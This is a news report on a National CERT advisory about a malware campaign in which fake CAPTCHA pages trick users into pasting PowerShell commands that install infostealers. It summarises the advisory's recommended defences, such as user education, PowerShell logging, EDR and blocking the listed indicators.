The National Computer Emergency Response Team (National CERT) has issued a cybersecurity advisory warning of a new malware campaign leveraging fake CAPTCHA verification pages to deceive users.
Dubbed “Fake CAPTCHA Pages Leveraging PowerShell for Malware Delivery,” the advisory details how cybercriminals are exploiting social engineering techniques to trick users into compromising their systems. The attack has already targeted users within the region, with a specific focus on those seeking free online content.
According to the advisory, threat actors redirect users to malicious websites disguised as platforms offering free media, where they are prompted to complete a CAPTCHA verification. Once users interact with the fraudulent CAPTCHA, a malicious script is copied to their clipboard, which they are tricked into executing. The attack primarily leverages PowerShell to download additional malware onto the victim’s system. This malware can include information-stealing tools and network scanners that facilitate further exploitation.
The attack begins when users are redirected to fake CAPTCHA pages designed to mimic legitimate verification processes. Upon interacting with the CAPTCHA, users inadvertently execute harmful PowerShell scripts that download and run malicious files from an attacker’s server. Key indicators of compromise (IOCs) include several malicious URLs and file hashes, which the advisory urges organizations to monitor and block immediately.
According to the National CERT, this campaign allows attackers to install various malware types, such as infostealers and network scanners, which enable lateral movement within compromised networks. The malicious PowerShell commands can bypass traditional security defenses, making it crucial for organizations to implement enhanced security measures, such as robust endpoint protection and detailed PowerShell logging.
The National CERT recommends several immediate preventive actions, including educating users about the risks of social engineering tactics, particularly those involving copying and pasting unknown commands. Additionally, organizations should continuously monitor network traffic for suspicious connections and enable PowerShell logging to detect unauthorized activity.
The advisory suggests implementing multi-factor authentication (MFA), restricting privileged access, and deploying endpoint detection and response (EDR) solutions to mitigate the risk of these attacks. Organizations are also urged to block all identified malicious domains and URLs to prevent further compromise.